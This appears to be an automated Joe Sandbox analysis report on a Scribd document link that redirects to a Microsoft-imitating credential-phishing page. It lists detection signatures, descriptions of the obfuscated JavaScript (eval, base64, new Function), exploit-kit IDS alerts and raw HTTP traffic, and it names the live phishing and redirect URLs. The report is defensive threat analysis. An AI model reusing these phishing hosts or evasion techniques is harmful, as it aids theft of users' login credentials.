Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.scribd.com/document/801519291/Advice-Notification#fullscreen&from_embed

Overview

General Information

Sample URL:https://www.scribd.com/document/801519291/Advice-Notification#fullscreen&from_embed
Analysis ID:1570408
Infos:

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
HTML page contains suspicious base64 encoded javascript
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of large embedded background images detected
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6904 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6304 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1788,i,12476349123992413655,12045162974044281250,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 304 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.scribd.com/document/801519291/Advice-Notification#fullscreen&from_embed" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
3.15.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-06T22:59:38.487607+010020221121Exploit Kit Activity Detected192.168.2.1649830162.159.140.229443TCP
    2024-12-06T22:59:38.688648+010020221121Exploit Kit Activity Detected192.168.2.1649835104.244.42.131443TCP

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/dri.htmlJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The provided URL 'pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev' does not match the legitimate domain for Microsoft., The URL uses a subdomain structure that is not typically associated with Microsoft., The domain extension '.dev' is unusual for a Microsoft service, which typically uses '.com'., The URL contains a random string which is often used in phishing attempts to obfuscate the true nature of the site. DOM: 3.15.pages.csv
    Source: Yara matchFile source: 3.15.pages.csv, type: HTML
    Source: https://www.scribd.com/document/801519291/Advice-Notification#fullscreen&from_embedJoe Sandbox AI: Page contains button: 'Access Document' Source: '1.2.pages.csv'
    Source: 0.59.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://doclinere.info/vn/re.htm... High-risk script using multiple suspicious patterns: 1) Uses eval with obfuscated code (+3), 2) Sets suspicious cookie with encoded value (+2), 3) Contains bot/automation detection logic (+1), 4) Uses heavily encoded/escaped strings (+3). Appears to be attempting to evade detection while performing potentially malicious actions.
    Source: 0.64.i.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://doclinere.info/vn/re.htm... High-risk script due to multiple concerning factors: 1) Uses eval() with obfuscated code (+3), 2) Contains encoded/obfuscated content that requires decoding (+3), 3) Manipulates cookies with suspicious values (+2). The script also appears to include anti-automation checks, which combined with obfuscation suggests potential malicious intent.
    Source: 0.65.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://doclinere.info/vn/re.htm... Script performs direct location redirection (+3) to a suspicious R2.dev domain (+2). The URL pattern and domain suggest potential malicious intent (+2). The use of HTML comments to hide the redirect is a suspicious obfuscation technique. R2.dev, while a legitimate Cloudflare service, is commonly abused for malware distribution when used with random subdomains.
    Source: 0.74.i.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.de... Script demonstrates suspicious behavior: uses atob() for base64 decoding of potentially obfuscated content, extracts URL parameters in an obfuscated way, and uses meaningless variable names (rh13z8jemt, pozzy). The code appears to be intentionally obscured with irrelevant comments about meat. Parameter extraction combined with base64 decoding is often associated with malicious payload delivery.
    Source: 0.68.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.de... High-risk script using multiple dangerous patterns: Base64 encoding to obfuscate code, dynamic code execution via 'new Function', cryptographic operations potentially for data exfiltration, document.write for DOM manipulation, and fetch requests with encoded payloads. The code is intentionally obfuscated and uses CryptoJS, possibly for malicious encryption/decryption of data.
    Source: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/dri.htmlHTTP Parser: Base64 decoded: document.write
    Source: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/dri.htmlHTTP Parser: Number of links: 0
    Source: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/dri.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
    Source: https://www.scribd.com/document/801519291/Advice-Notification#fullscreen&from_embedHTTP Parser: Total embedded background img size: 875765
    Source: https://doclinere.info/vn/re.htmHTTP Parser: Base64 decoded: 1733522386.000000
    Source: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/dri.htmlHTTP Parser: Title: Sign in to your account does not match URL
    Source: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/dri.htmlHTTP Parser: Invalid link: Privacy statement
    Source: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/dri.htmlHTTP Parser: <input type="password" .../> found
    Source: https://www.scribd.com/document/801519291/Advice-Notification#fullscreen&from_embedHTTP Parser: No favicon
    Source: https://www.scribd.com/document/801519291/Advice-Notification#fullscreen&from_embedHTTP Parser: No favicon
    Source: https://www.scribd.com/document/801519291/Advice-Notification#fullscreen&from_embedHTTP Parser: No favicon
    Source: https://www.scribd.com/document/801519291/Advice-Notification#fullscreen&from_embedHTTP Parser: No favicon
    Source: https://doclinere.info/vn/re.htmHTTP Parser: No favicon
    Source: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/dri.htmlHTTP Parser: No favicon
    Source: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/dri.htmlHTTP Parser: No favicon
    Source: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/dri.htmlHTTP Parser: No favicon
    Source: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/dri.htmlHTTP Parser: No favicon
    Source: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/dri.htmlHTTP Parser: No <meta name="author".. found
    Source: https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/dri.htmlHTTP Parser: No <meta name="copyright".. found
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
    Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49720 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49729 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49732 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49947 version: TLS 1.2
    Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.16:49835 -> 104.244.42.131:443
    Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.16:49830 -> 162.159.140.229:443
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 23.32.238.18
    Source: unknownTCP traffic detected without corresponding DNS query: 23.32.238.18
    Source: unknownTCP traffic detected without corresponding DNS query: 23.32.238.18
    Source: unknownTCP traffic detected without corresponding DNS query: 23.32.238.18
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /document/801519291/Advice-Notification HTTP/1.1Host: www.scribd.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /options/exposed_to_client.js HTTP/1.1Host: www.scribd.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/document/801519291/Advice-NotificationAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D
    Source: global trafficHTTP traffic detected: GET /webpack/assets/fonts/source_sans_pro/regular/source_sans_pro_regular.latin.e8ecbdac.woff2 HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/assets/fonts/source_sans_pro/semibold/source_sans_pro_600.latin.76017e81.woff2 HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/monolith/105.02924deb17e63c446344.css HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /options/exposed_to_client.js HTTP/1.1Host: www.scribd.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D
    Source: global trafficHTTP traffic detected: GET /AzZdHGSGtpxCq1Cpt/4e10b135-d113-4574-a477-270ace40bba7/osano.js?language=en HTTP/1.1Host: cmp.osano.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /975ow02iyodmurb1/images/1-4596bc3e1d.jpg HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /v3/ HTTP/1.1Host: js.stripe.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/assets/fonts/icons/icons.d2ecf18b.woff2 HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/assets/fonts/source_serif_pro/semibold/source_serif_pro_semibold.latin.f74d6620.woff2 HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/doc_page/245.799c3a.js HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/doc_page/app.d6ad9e.js HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /975ow02iyodmurb1/images/1-4596bc3e1d.jpg HTTP/1.1Host: html.scribdassets.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
    Source: global trafficHTTP traffic detected: GET /AzZdHGSGtpxCq1Cpt/4e10b135-d113-4574-a477-270ace40bba7/osano.js?language=en HTTP/1.1Host: cmp.osano.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: cmp.osano.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=NsFdCpOb8MEGFPx&MD=+MfZCRKU HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
    Source: global trafficHTTP traffic detected: GET /webpack/assets/images/shared/gr_table_reading.9f6101a1.png HTTP/1.1Host: s-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /975ow02iyodmurb1/fonts/0000.woff2 HTTP/1.1Host: html.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/doc_page/app.d6ad9e.js HTTP/1.1Host: s-f.scribdassets.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /v3/ HTTP/1.1Host: js.stripe.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/assets/images/shared/gr_table_reading.9f6101a1.png HTTP/1.1Host: s-f.scribdassets.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wi/ytc.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /a-05td.min.js HTTP/1.1Host: b-code.liadm.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /webpack/doc_page/245.799c3a.js HTTP/1.1Host: s-f.scribdassets.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /doc-page/recommenders/801519291?recs_veils_of_discoverability=undefined&recs_embedding_reranking_docpage=undefined&recs_explore_rerank_scribd=undefined&doc_page_pmp_boosting=control HTTP/1.1Host: www.scribd.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/document/801519291/Advice-NotificationAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; 